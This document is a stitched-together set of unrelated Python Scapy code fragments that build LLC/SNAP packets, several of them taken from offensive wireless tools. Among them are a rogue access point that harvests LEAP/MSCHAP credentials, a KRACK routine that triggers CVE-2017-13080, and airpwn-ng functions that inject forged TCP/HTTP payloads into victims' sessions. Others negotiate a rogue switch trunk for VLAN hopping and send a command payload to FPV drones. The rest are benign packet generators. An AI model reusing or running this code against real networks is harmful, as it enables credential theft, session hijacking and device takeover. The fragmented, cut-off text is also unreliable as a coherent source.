def handleLEAP(self, sockObj, identity): self.networkDescriptor.addEapType(17) tries = self.max_tries while tries: tries -= 1 sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) / SNAP(code=0x888e) / EAPOL(version=2, type=0) / EAP(code=1, type=17, id=2) / LEAP(data=self.mschap_challenge), FCfield=2, raw=True) data = sockObj.recv() if data is None: continue if not data.haslayer(EAP): continue if not data.haslayer(LEAP): eap = data.getlayer(EAP) if eap.type == 3: return 1, tuple(eap.eap_types) continue leap = data.getlayer(LEAP) sockObj.clientDescriptor.addIdentity(17, identity) sockObj.clientDescriptor.addEapType(17) sockObj.clientDescriptor.addMSChapInfo(17, self.mschap_challenge, leap.data, identity) return 0, None if tries != self.max_tries: return 2, None
def search_n_destroy(iface: str): setup_monitor(iface) pkts_stream = sniff_gen(iface=iface) for pkt in pkts_stream: if UDP in pkt: dgram = pkt[UDP] if dgram.dport == 5555: frame = ( RadioTap() / Dot11FCS( subtype=8, type="Data", proto=0, FCfield="to-DS", addr1=pkt[Dot11].addr1, addr2=pkt[Dot11].addr2, addr3=pkt[Dot11].addr3, ) / Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) / LLC(dsap=0xAA, ssap=0xAA, ctrl=3) / SNAP(OUI=0x0, code="IPv4") / IP(version=4, proto="udp", src=pkt[IP].src, dst=pkt[IP].dst) / UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex( "436d640001001200010404000a000000808080802020202010652f" ))) sendp(frame, iface=iface) break
def negotiate_trunk(iface=conf.iface, mymac=str(RandMAC())): print("Trying to negotiate a trunk on interface %s" % iface) p = Dot3(src=mymac, dst="01:00:0c:cc:cc:cc") / LLC() / SNAP() / DTP(tlvlist=[ DTPDomain(), DTPStatus(), DTPType(), DTPNeighbor(neighbor=mymac) ]) sendp(p)
def llc_enumerate(self, timeout): bcast = "ff:ff:ff:ff:ff:ff" bcast_packet = LLC() / SNAP() / s01fd.S01FD(type=0x0500) answers = self._ether_.sendrcv_timeout(bcast, bcast_packet, timeout) macs = [] for x in answers: if x.haslayer(s01fd.S01FD): if x[s01fd.S01FD].type == 0x0501: macs.append(x.src) return macs
def send_ether_over_wpa(self, pkt, **kwargs): """Send an Ethernet packet using the WPA channel Extra arguments will be ignored, and are just left for compatibiliy """ payload = LLC() / SNAP() / pkt[Ether].payload dest = pkt.dst if dest == "ff:ff:ff:ff:ff:ff": self.send_wpa_to_group(payload, dest) else: assert dest == self.client self.send_wpa_to_client(payload)
def accept(self): """ This extends the WirelessStateMachineSoftAP accept() method but adds in the exchange of EAP identities. """ while not self.__shutdown__: (sockObj, clientMAC) = WirelessStateMachineSoftAP.accept(self) tries = self.max_tries while tries: tries -= 1 data = sockObj.recv() if not data: continue if data.haslayer(EAPOL): tries = self.max_tries break elif data.haslayer('Dot11AssoReq'): sockObj.send(self.asso_resp_data, 0, 1, 0x10, True) if tries != self.max_tries: continue # shit failed in that loop up there sockObj.sequence = 1 while tries: tries -= 1 sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) / SNAP(code=0x888e) / EAPOL(version=2, type=0) / EAP(code=1, type=1, id=0, identity='\x00networkid=' + self.essid + ',nasid=AP,portid=0'), FCfield=2, raw=True) data = sockObj.recv() if data is None: continue if not data.haslayer(EAP): continue data = data.getlayer(EAP) if not 'identity' in data.fields: continue tries = self.max_tries break if tries != self.max_tries: continue eaptype = self.eap_priorities[0] self.eap_handlers[eaptype](sockObj, data.identity) self.networkDescriptor.addClient(sockObj.clientDescriptor) return sockObj, clientMAC
def handlePEAP(self, sockObj, identity): """ This is not yet supported. Don't even bother trying. """ self.networkDescriptor.addEapType(25) tries = self.max_tries while tries: tries -= 1 sockObj.send('\x00\x00' / LLC(dsap=0xaa, ssap=0xaa, ctrl=3) / SNAP(code=0x888e) / EAPOL(version=2, type=0) / EAP(code=1, type=25, id=2) / PEAP(version=1, flags='start'), FCfield=2, raw=True) return 0, None if tries != self.max_tries: return 2, None
def krack_proceed(self, send_3handshake=False, send_gtk=False): if send_3handshake: rep = RadioTap() rep /= Dot11( addr1=self.client, addr2=self.mac, addr3=self.mac, FCfield='from-DS', SC=(next(self.seq_num) << 4), subtype=0, type="Data", ) rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3) rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication data = self.RSN data += self.build_GTK_KDE() eap_2 = self.build_EAPOL_Key_8021X2004( # Key information 0x13c9: # ARC4 HMAC-MD5, Pairwise Key, Install, KEY ACK, KEY MIC, Secure, # Encrypted, SMK key_information=0x13c9, replay_counter=next(self.replay_counter), nonce=self.anonce, data=data, key_mic=self.kck, key_data_encrypt=self.kek, ) rep /= eap_2 if self.encrypt_3handshake: self.send_wpa_to_client(rep[LLC]) else: self.send(rep) self.krack_state |= 1 if send_gtk: self.krack_state |= 2 # Renew the GTK self.install_GTK() raise self.RENEW_GTK()
def send_wpa_handshake_3(self, pkt): # Both nonce have been exchanged, install keys client_nonce = pkt[EAPOL].load[13:13 + 0x20] self.install_unicast_keys(client_nonce) # Check client MIC # Data: full message with MIC place replaced by 0s # https://stackoverflow.com/questions/15133797/creating-wpa-message-integrity-code-mic-with-python client_mic = pkt[EAPOL].load[77:77 + 16] client_data = raw(pkt[EAPOL]).replace(client_mic, "\x00" * len(client_mic)) assert hmac.new(self.kck, client_data, hashlib.md5).digest() == client_mic rep = RadioTap() rep /= Dot11( addr1=self.client, addr2=self.mac, addr3=self.mac, FCfield='from-DS', SC=(next(self.seq_num) << 4), ) rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3) rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication self.install_GTK() data = self.RSN data += self.build_GTK_KDE() eap = self.build_EAPOL_Key_8021X2004( key_information=0x13c9, replay_counter=next(self.replay_counter), nonce=self.anonce, data=data, key_mic=self.kck, key_data_encrypt=self.kek, ) self.send(rep / eap)
def send_renew_gtk(self): rep_to_enc = LLC(dsap=0xaa, ssap=0xaa, ctrl=3) rep_to_enc /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication data = self.build_GTK_KDE() eap = self.build_EAPOL_Key_8021X2004( # Key information 0x1381: # ARC4 HMAC-MD5, Group Key, KEY ACK, KEY MIC, Secure, Encrypted, # SMK key_information=0x1381, replay_counter=next(self.replay_counter), nonce=self.anonce, data=data, key_mic=self.kck, key_data_encrypt=self.kek, ) rep_to_enc /= eap self.send_wpa_to_client(rep_to_enc)
def send_wpa_handshake_1(self): self.anonce = self.gen_nonce(32) rep = RadioTap() rep /= Dot11( addr1=self.client, addr2=self.mac, addr3=self.mac, FCfield='from-DS', SC=(next(self.seq_num) << 4), ) rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3) rep /= SNAP(OUI=0, code=0x888e) # 802.1X Authentication rep /= self.build_EAPOL_Key_8021X2004( key_information=0x89, replay_counter=next(self.replay_counter), nonce=self.anonce, ) self.send(rep)
def search_n_destroy(iface: str): setup_monitor(iface) pkts_stream = sniff_gen(iface=iface) for pkt in pkts_stream: if Dot11Beacon in pkt: beacon = pkt[Dot11Beacon] network = beacon.network_stats() ssid = network.get("ssid") if ssid and ssid.startswith("FPV_"): print(network) sender = "b2:43:f6:64:a2:bb" bssid = "14:6b:9c:58:75:07" frame = send_asso_req(sender, bssid, ssid) sendp(frame, iface=iface) frame = ( RadioTap() / Dot11FCS( subtype=8, type="Data", proto=0, FCfield="to-DS", addr1=bssid, addr2=sender, addr3=bssid, ) / Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) / LLC(dsap=0xAA, ssap=0xAA, ctrl=3) / SNAP(OUI=0x0, code="IPv4") / IP(version=4, proto="udp", src="172.16.10.187", dst="172.16.10.1") / UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex( "436d640001001200010404000a000000808080802020202010652f" ))) print(frame) sendp(frame, iface=iface)
def send_arp_req(self): if self.krack_state & 4 == 0: # Set the address for future uses self.arp_target_ip = self.dhcp_server.leases.get(self.client, self.arp_target_ip) assert self.arp_target_ip is not None # Send the first ARP requests, for control test log_runtime.info("Send ARP who-was from '%s' to '%s'", self.arp_source_ip, self.arp_target_ip) arp_pkt = self.send_wpa_to_group( LLC()/SNAP()/ARP(op="who-has", psrc=self.arp_source_ip, pdst=self.arp_target_ip, hwsrc=self.mac), dest='ff:ff:ff:ff:ff:ff', ) self.arp_sent.append(arp_pkt) else: if self.arp_to_send < len(self.arp_sent): # Re-send the ARP requests already sent self.send(self.arp_sent[self.arp_to_send]) self.arp_to_send += 1 else: # Re-send GTK self.arp_to_send = 0 self.arp_retry += 1 log_runtime.info("Trying to trigger CVE-2017-13080 %d/%d", self.arp_retry, self.ARP_MAX_RETRY) if self.arp_retry > self.ARP_MAX_RETRY: # We retries 100 times to send GTK, then already sent ARPs log_runtime.warning("Client is likely not vulnerable to " "CVE-2017-13080") raise self.EXIT() raise self.RENEW_GTK()
def deal_common_pkt(self, pkt): # Send to DHCP server # LLC / SNAP to Ether if SNAP in pkt: ether_pkt = Ether(src=self.client,dst=self.mac) / pkt[SNAP].payload self.dhcp_server.reply(ether_pkt) # If an ARP request is made, extract client IP and answer if ARP in pkt and \ pkt[ARP].op == 1 and pkt[ARP].pdst == self.dhcp_server.gw: if self.arp_target_ip is None: self.arp_target_ip = pkt[ARP].psrc log_runtime.info("Detected IP: %s", self.arp_target_ip) # Reply ARP_ans = LLC()/SNAP()/ARP( op="is-at", psrc=self.arp_source_ip, pdst=self.arp_target_ip, hwsrc=self.mac, hwdst=self.client, ) self.send_wpa_to_client(ARP_ans)
from scapy.utils import rdpcap from pyDot11.__init__ import wepEncrypt from pyDot11.lib.utils import Pcap from pyDot11.lib.wep import Wep #Sending from a pcap wepPkts = rdpcap('PCAPs/ICMPs/wep_pings.pcap') wepPkts.summary() input = wepPkts.__class__(str(wepPkts)[0:-4]) #print(input.summary()) sendp(wepPkts) # Sending a simple packet sender='08:00:27:c6:e4:20' dest='08:00:27:1b:8b:a3' packet=Dot11(addr1=dest,addr2=sender,addr3=sender)/LLC()/SNAP()/IP(src="192.168.3.7",dst="192.168.3.5")/ICMP()/"Hello!" print(packet.summary()) #print(packet.show()) sendp(packet) encPkt = wepEncrypt(packet,'0123456789') print(encPkt.summary()) #print(encPkt.show()) sendp(encPkt) #Sending a Dot11 Beacon packet SSID = 'Test SSID' iface = 'eth0' dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender,
def inject(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport, acknum, seqnum, injection, TSVal, TSecr): """Send the injection using Scapy This method is where the actual packet is created for sending Things such as payload and associated flags are genned here FIN/ACK flag is sent to the victim with this method """ ## Headers headers = self.hdr.default(injection) ## Monitor if self.args.inj == 'mon': ## WEP/WPA if self.args.wep or self.args.wpa: packet = RadioTap()\ /Dot11( FCfield = 'from-DS', addr1 = vicmac, addr2 = rtrmac, addr3 = dstmac, subtype = 8, type = 2 )\ /Dot11QoS()\ /LLC()\ /SNAP()\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) ## Open else: packet = RadioTap()\ /Dot11( FCfield = 'from-DS', addr1 = vicmac, addr2 = rtrmac, addr3 = dstmac )\ /LLC()\ /SNAP()\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None and TSecr is not None: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), TSVal)))] else: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), 0))) ] ## WPA if self.args.wpa is not None: if self.shake.encDict.get(vicmac) == 'ccmp': ### Why are we incrementing here? Been done before in wpaEncrypt(), verify this. try: self.shake.PN[5] += 1 except: self.shake.PN[4] += 1 try: packet = wpaEncrypt( self.shake.tgtInfo.get(vicmac)[1], self.shake.origPkt, packet, self.shake.PN, True) except: sys.stdout.write( Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC) sys.stdout.flush() else: sys.stdout.write( Bcolors.FAIL + '\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n ' + Bcolors.ENDC) sys.stdout.flush() ## WEP Injection elif self.args.wep is not None: try: packet = wepEncrypt(packet, self.args.wep) except: sys.stdout.write( Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC) sys.stdout.flush() ## Managed else: headers = self.hdr.default(injection) packet = Ether(\ src = self.injMac,\ dst = vicmac\ )\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None: packet[TCP].options = [\ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), TSVal)))\ ] else: packet[TCP].options = [\ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), 0)))\ ] ## Inject gs(self.injSocket, packet, verbose=False) print('[*] Packet injected to {0}'.format(vicmac))
def gen_layer2_traffic(self, iface, num_packets, pkt_interval, max_phy_broadcast_rate_mbps, **kwargs): self.log.info('gen_layer2_traffic ... here 802.11()') ipdst = kwargs.get('ipdst') ipsrc = kwargs.get('ipsrc') # get my MAC HW address myMacAddr = self.getHwAddr(iface) dstMacAddr = 'ff:ff:ff:ff:ff:ff' if pkt_interval is not None: # generate with some packet interval if num_packets > 255: num_packets = 255 data = (RadioTap() / Dot11(type=2, subtype=0, addr1=dstMacAddr, addr2=myMacAddr, addr3=myMacAddr) / LLC() / SNAP() / IP(dst=ipdst, src=ipsrc, ttl=(1, num_packets))) sendp(data, iface=iface, inter=pkt_interval) return 1.0 / pkt_interval else: assert max_phy_broadcast_rate_mbps is not None ipPayloadSize = kwargs["ipPayloadSize"] phyBroadcastMbps = kwargs["phyBroadcastMbps"] use_tcpreplay = kwargs.get('use_tcpreplay') # craft packet to be transmitted payload = 'Z' * ipPayloadSize data = (RadioTap() / Dot11(type=2, subtype=0, addr1=dstMacAddr, addr2=myMacAddr, addr3=myMacAddr) / LLC() / SNAP() / IP(dst=ipdst, src=ipsrc) / payload) # send 10 packets backlogged now = datetime.now() if use_tcpreplay: # use tcprelay sendpfast(data, iface=iface, mbps=phyBroadcastMbps, loop=num_packets, file_cache=True) else: piter = (len(data) * 8) / (phyBroadcastMbps * 1e6) sendp(data, iface=iface, loop=1, inter=piter, realtime=True, count=num_packets, verbose=0) delta = datetime.now() - now myDelta = delta.seconds + delta.microseconds / 1000000.0 # calc achieved transmit data rate tx_frame_rate = (1.0 / (myDelta / num_packets)) self.log.info('gen80211L2LinkProbing(): tx_frame_rate=%d' % int(tx_frame_rate)) return tx_frame_rate
def inject(self, tgtmac, rtrmac, dstmac, tgtip, svrip, tgtport, svrport, acknum, seqnum, injection, TSVal, TSecr): """Send the injection using Scapy This method is where the actual packet is created for sending things such as the payload and associated flags. FIN/ACK flag is sent to the target with this method. """ ## Headers headers = self.hdr.default(injection) if self.args.tun is False: ## Monitor injection if self.args.inj == 'mon': packet = RadioTap()\ /Dot11( FCfield = 'from-DS', addr1 = tgtmac, addr2 = rtrmac, addr3 = dstmac )\ /LLC()\ /SNAP()\ /IP( dst = tgtip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(tgtport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None and TSecr is not None: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), TSVal)))] else: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), 0)))] ## Managed injection else: headers = self.hdr.default(injection) packet = Ether( src = self.injMac,\ dst = tgtmac\ )\ /IP( dst = tgtip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(tgtport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None: packet[TCP].options = [\ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), TSVal)))\ ] else: packet[TCP].options = [\ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), 0)))\ ] ## Managed else: try: headers = self.hdr.default(injection) packet = Ether( src = self.injMac,\ dst = tgtmac\ )\ /IP( dst = tgtip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(tgtport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None: packet[TCP].options = [ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), TSVal)))\ ] else: packet[TCP].options = [ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), 0)))\ ] except Exception as E: print(E) ## Inject try: gs(self.injSocket, packet, verbose=False) print('[*] Packet injected to {0}'.format(tgtmac)) except Exception as E: print(E)
def inject(self, vicmac, rtrmac, dstmac, vicip, svrip, vicport, svrport, acknum, seqnum, injection, TSVal, TSecr): """Send the injection using Scapy This method is where the actual packet is created for sending Things such as payload and associated flags are genned here FIN/ACK flag is sent to the victim with this method """ global npackets npackets += 1 sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC) sys.stdout.flush() ## Injection using Monitor Mode if self.args.inj == 'mon': hdr = Headers() headers = hdr.default(injection) ## WEP/WPA if self.args.wep or self.args.wpa: packet = self.rTap\ /Dot11( FCfield = 'from-DS', addr1 = vicmac, addr2 = rtrmac, addr3 = dstmac, subtype = 8L, type = 2 )\ /Dot11QoS()\ /LLC()\ /SNAP()\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) ## Open else: packet = RadioTap()\ /Dot11( FCfield = 'from-DS', addr1 = vicmac, addr2 = rtrmac, addr3 = dstmac )\ /LLC()\ /SNAP()\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None and TSecr is not None: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), TSVal)))] else: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), 0))) ] ## WPA Injection if self.args.wpa is not None: if self.shake.encDict.get(vicmac) == 'ccmp': ### Why are we incrementing here? Been done before in wpaEncrypt(), verify this. try: self.shake.PN[5] += 1 except: self.shake.PN[4] += 1 try: packet = wpaEncrypt( self.shake.tgtInfo.get(vicmac)[1], self.shake.origPkt, packet, self.shake.PN, True) except: sys.stdout.write( Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC) sys.stdout.flush() else: sys.stdout.write( Bcolors.FAIL + '\n[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n ' + Bcolors.ENDC) sys.stdout.flush() #packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0], #self.shake.origPkt, #packet, #self.shake.PN, #True) if self.args.v is False: sendp(packet, iface=self.interface, verbose=0) else: sendp(packet, iface=self.interface, verbose=1) if self.args.pcap is True: wrpcap('outbound.pcap', packet) ## WEP Injection elif self.args.wep is not None: try: packet = wepEncrypt(packet, self.args.wep) except: sys.stdout.write( Bcolors.FAIL + '\n[!] pyDot11 did not work\n[!] Injection failed\n ' + Bcolors.ENDC) sys.stdout.flush() if self.args.v is False: sendp(packet, iface=self.interface, verbose=0) else: sendp(packet, iface=self.interface, verbose=1) if self.args.pcap is True: wrpcap('outbound.pcap', packet) ## Open WiFi Injection else: if self.args.v is False: sendp(packet, iface=self.interface, verbose=0) else: sendp(packet, iface=self.interface, verbose=1) if self.args.pcap is True: wrpcap('outbound.pcap', packet) ### Single packet exit point ### Used for BeEF hook examples and such if self.args.single is True: sys.stdout.write(Bcolors.OKBLUE + '[*] Injecting Packet to victim ' + Bcolors.WARNING + vicmac + Bcolors.OKBLUE + ' (TOTAL: ' + str(npackets) + ' injected packets)\r' + Bcolors.ENDC) sys.exit(0) ## Injection using Managed Mode else: hdr = Headers() headers = hdr.default(injection) packet = Ether(\ src = self.getHwAddr(self.interface),\ dst = vicmac\ )\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None: packet[TCP].options = [\ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), TSVal)))\ ] else: packet[TCP].options = [\ ('NOP', None),\ ('NOP', None),\ ('Timestamp', ((round(time.time()), 0)))\ ] if self.args.v is False: sendp(packet, iface=self.interface, verbose=0) else: sendp(packet, iface=self.interface, verbose=1) if self.args.pcap is True: wrpcap('outbound.pcap', packet)
def check_eap_type(self, essid, eaptype, outer_identity='user', eapol_start=False, rsnInfo=''): """ Check that an eaptype is supported. errDict = { 0:"supported", 1:"not supported", 2:"could not determine", 3:"identity rejected" } """ eapid = randint(1, 254) if eapol_start: eapol_start_request = (RadioTap() / Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) / EAPOL(version=1, type=1)) self.sequence += 1 i = 0 for i in range(0, EAP_MAX_TRIES): self.__thread_sendp__(eapol_start_request) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer('EAP').fields if 'type' in fields and fields['type'] == 1 and fields[ 'code'] == 1: i = 0 eapid = fields['id'] break if i == 2: return 2 eap_identity_response = ( RadioTap() / Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) / EAPOL(version=1, type=0) / EAP(code=2, type=1, id=eapid, identity=outer_identity)) eap_legacy_nak = ( RadioTap() / Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / SNAP(code=0x888e) / EAPOL(version=1, type=0, len=6) / EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype])) self.sequence += 1 for i in range(0, EAP_MAX_TRIES): self.__thread_sendp__(eap_identity_response) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer('EAP').fields if fields['code'] == 4: # 4 is a failure return 3 if 'type' in fields and fields['type'] == eaptype: return 0 i = 0 break if i == 2: return 2 for i in range(0, EAP_MAX_TRIES): self.__thread_sendp__(eap_legacy_nak) if not self.lastpacket is None: if self.lastpacket.haslayer('EAP'): fields = self.lastpacket.getlayer('EAP').fields if 'type' in fields and fields['type'] == eaptype: return 0 else: return 1 return 2
def create_base_packet(self): packet = ( Dot3(src=self.interface.remote_mac, dst="01:00:0c:cc:cc:cc") / LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP() / CDPv2_HDR()) return packet
def inject(self, vicmac, rtrmac, vicip, svrip, vicport, svrport, acknum, seqnum, injection, TSVal, TSecr): """Send the injection using Scapy This method is where the actual packet is created for sending Things such as payload and associated flags are genned here FIN/ACK flag is sent to the victim with this method """ ## HTML headers headers = '\r\n'.join([ 'HTTP/1.1 200 OK', 'Date: {}'.format( time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime())), 'Server: Apache', 'Content-Length: {}'.format(len(injection)), 'Connection: close', 'Content-Type: text/html\r\n\r\n' ]) ## Monitor if self.args.inj == 'mon': ## WEP/WPA if self.args.wep or self.args.wpa: # packet = self.rTap\ packet = RadioTap()\ /Dot11( FCfield = 'from-DS', addr1 = vicmac, addr2 = rtrmac, addr3 = rtrmac, subtype = 8L, type = 2 )\ /Dot11QoS()\ /LLC()\ /SNAP()\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) ## Open else: packet = RadioTap()\ /Dot11( FCfield = 'from-DS', addr1 = vicmac, addr2 = rtrmac, addr3 = rtrmac )\ /LLC()\ /SNAP()\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) ## Managed else: packet = Ether(src = self.getHwAddr(self.interface), dst=vicmac)\ /IP( dst = vicip, src = svrip )\ /TCP( flags = 'FA', sport = int(svrport), dport = int(vicport), seq = int(seqnum), ack = int(acknum) )\ /Raw( load = headers + injection ) if TSVal is not None and TSecr is not None: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), TSVal))) ] else: packet[TCP].options = [('NOP', None), ('NOP', None), ('Timestamp', ((round(time.time()), 0)))] ## Encrypt if using monitor mode if self.args.inj == 'mon': ## WPA Injection if self.args.wpa is not None: ## CCMP if self.shake.encDict.get(vicmac) == 'ccmp': try: self.shake.PN[5] += 1 except: self.shake.PN[4] += 1 packet = wpaEncrypt( self.shake.tgtInfo.get(vicmac)[1], self.shake.origPkt, packet, self.shake.PN, False) ### DEBUG SET TO FALSE FOR NOW ## TKIP, use --inj man as a workaround else: print( '[!] airpwn-ng cannot inject TKIP natively\n[!] Injection failed\n[!] Use --inj "man" as a workaround' ) sys.exit() #packet = wpaEncrypt(self.shake.tgtInfo.get(vicmac)[0], #self.shake.origPkt, #packet, #self.shake.PN, #True) ## WEP elif self.args.wep is not None: packet = wepEncrypt(packet, self.args.wep) ## Inject sendp(packet, iface=self.interface, verbose=False) # gs(self.injSocket, packet, verbose = False) print('[*] Packet injected to {0}'.format(vicmac))
def dup_snap(pkt): s_pkt = pkt.getlayer(SNAP) oui = s_pkt.OUI code = s_pkt.code n_pkt = SNAP(OUI=oui, code=code) return n_pkt
def dupSNAP(pkt): sPkt = pkt.getlayer(SNAP) oui = sPkt.OUI code = sPkt.code nPkt = SNAP(OUI=oui, code=code) return nPkt
'type': 0x8809, 'load': Raw('\x02') / Raw('\0' * 49) }, 'oam': { 'mac': '01:80:c2:00:00:02', 'type': 0x8809, 'load': Raw('\x03') / Raw('\0' * 49) }, 'lbd': { 'mac': '01:80:c2:00:00:02', 'type': 0x8809, 'load': Raw('\xFF') / Raw('\0' * 49) }, 'cdp': { 'mac': '01:00:0c:cc:cc:cc', 'load': LLC() / SNAP(OUI=0x00000C, code=0x2000) / Raw('\0' * 370) }, 'pagp': { 'mac': '01:00:0c:cc:cc:cc', 'load': LLC() / SNAP(OUI=0x00000C, code=0x0104) / Raw('\0' * 62) }, 'udld': { 'mac': '01:00:0c:cc:cc:cc', 'load': LLC() / SNAP(OUI=0x00000C, code=0x0111) / Raw('\0' * 60) }, 'vtp': { 'mac': '01:00:0c:cc:cc:cc', 'load': LLC() / SNAP(OUI=0x00000C, code=0x2003) / Raw('\0' * 77) }, 'pvst': { 'mac': '01:00:0c:cc:cc:cd',
frame = frame / IP(dst = ip_dst, src = ip_src, tos = tos_val, ttl = ttl) return add_payload(frame, size, pattern) ## Utility to create dummy protocols frames ####################################################### pdu_info = { 'stp' : { 'mac' : '01:80:c2:00:00:00', 'load' : LLC() / STP() }, 'rstp' : { 'mac' : '01:80:c2:00:00:00', 'load' : LLC() / STP(version = 2) / Raw('\0') }, 'lldp' : { 'mac' : '01:80:c2:00:00:0e', 'type' : 0x88cc, 'load' : Raw('\0' * 282) }, 'lacp' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\x01') / Raw('\0' * 109) }, 'marker' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\x02') / Raw('\0' * 49) }, 'oam' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\x03') / Raw('\0' * 49) }, 'lbd' : { 'mac' : '01:80:c2:00:00:02', 'type' : 0x8809, 'load' : Raw('\xFF') / Raw('\0' * 49) }, 'cdp' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x2000) / Raw('\0' * 370) }, 'pagp' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x0104) / Raw('\0' * 62) }, 'udld' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x0111) / Raw('\0' * 60) }, 'vtp' : { 'mac' : '01:00:0c:cc:cc:cc', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x2003) / Raw('\0' * 77) }, 'pvst' : { 'mac' : '01:00:0c:cc:cc:cd', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x010b) / STP() }, 'dtp' : { 'mac' : '01:00:0c:cc:cc:cd', 'load' : LLC() / SNAP(OUI = 0x00000C, code = 0x2004) / Raw('\0' * 31) }, 'gvrp' : { 'mac' : '01:80:c2:00:00:21', 'load' : LLC(dsap = 0x42, ssap = 0x42, ctrl = 0x03) / Raw('\x00\x01') / Raw('\0' * 41) }, 'gmrp' : { 'mac' : '01:80:c2:00:00:20', 'load' : LLC(dsap = 